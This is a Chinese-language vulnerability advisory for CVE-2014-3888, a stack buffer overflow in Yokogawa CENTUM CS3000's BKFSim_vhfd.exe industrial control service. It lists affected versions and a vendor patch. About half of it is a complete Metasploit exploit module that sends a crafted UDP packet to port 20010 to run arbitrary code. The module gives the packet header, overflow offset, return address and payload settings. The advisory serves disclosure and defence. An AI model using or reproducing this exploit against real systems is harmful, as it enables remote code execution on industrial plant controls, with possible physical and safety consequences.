多个Yokogawa产品\'BKFSim_vhfd.exe\'栈缓冲区溢出漏洞

BugTraq-ID:68428

CVE-ID:CVE-2014-3888

发布日期：2014-07-07

更新日期：2014-12-08

受影响系统：

yokogawa CS3000

详细信息：

Yokogawa日本横河电机株式会社，是测量、工业自动化控制、和信息系统的领导者。CS3000是基于Windows的生产控制系统。 Yokogawa CENTUM CS 1000, CENTUM CS 3000 R3.09.50及更早版本, CENTUM VP R5.03.20及更早版本, Exaopc R3.72.00及更早版本, B/M9000CS R5.05.01及更早版本, B/M9000 VP R7.03.01及更早版本中，BKFSim_vhfd.exe在实现上存在栈缓冲区溢出漏洞，在启用了FCS/Test函数后，远程攻击者通过构造的数据包，利用此漏洞可执行任意代码。

来源：

Juan Vazquez

测试方法：

警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require \'msf/core\' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) super(update_info(info, \'Name\' => \'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow\', \'Description\' => %q{ This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create logs using functions like vsprintf and memcpy in a insecure way. This module has been tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3. }, \'Author\' => [ \'Redsadic <julian.vilas[at]gmail.com>\', \'juan vazquez\' ], \'References\' => [ [\'CVE\', \'2014-3888\'], [\'URL\', \'http://jvn.jp/vu/JVNVU95045914/index.html\'], [\'URL\', \'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf\'], [\'URL\', \'https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow\'] ], \'Payload\' => { \'Space\' => 1770, # 2228 (max packet length) - 16 (header) - (438 target[\'Offset\']) - 4 (ret) \'DisableNops\' => true, \'BadChars\' => "\\x00", \'PrependEncoder\' => "\\x81\\xc4\\x54\\xf2\\xff\\xff" # Stack adjustment # add esp, -3500 }, \'Platform\' => \'win\', \'Targets\' => [ [ \'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3\', { \'Ret\' => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll \'Offset\' => 438 } ], ], \'DisclosureDate\' => \'May 23 2014\', \'DefaultTarget\' => 0)) register_options( [ Opt::RPORT(20010) ], self.class) end def exploit connect_udp sploit = "\\x45\\x54\\x56\\x48\\x01\\x01\\x10\\x09\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x44" # header sploit << rand_text(target[\'Offset\']) sploit << [target.ret].pack("V") sploit << payload.encoded print_status("Trying target #{target.name}, sending #{sploit.length} bytes...") udp_sock.put(sploit) disconnect_udp end end

解决办法：

厂商补丁：

yokogawa

--------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.yokogawa.com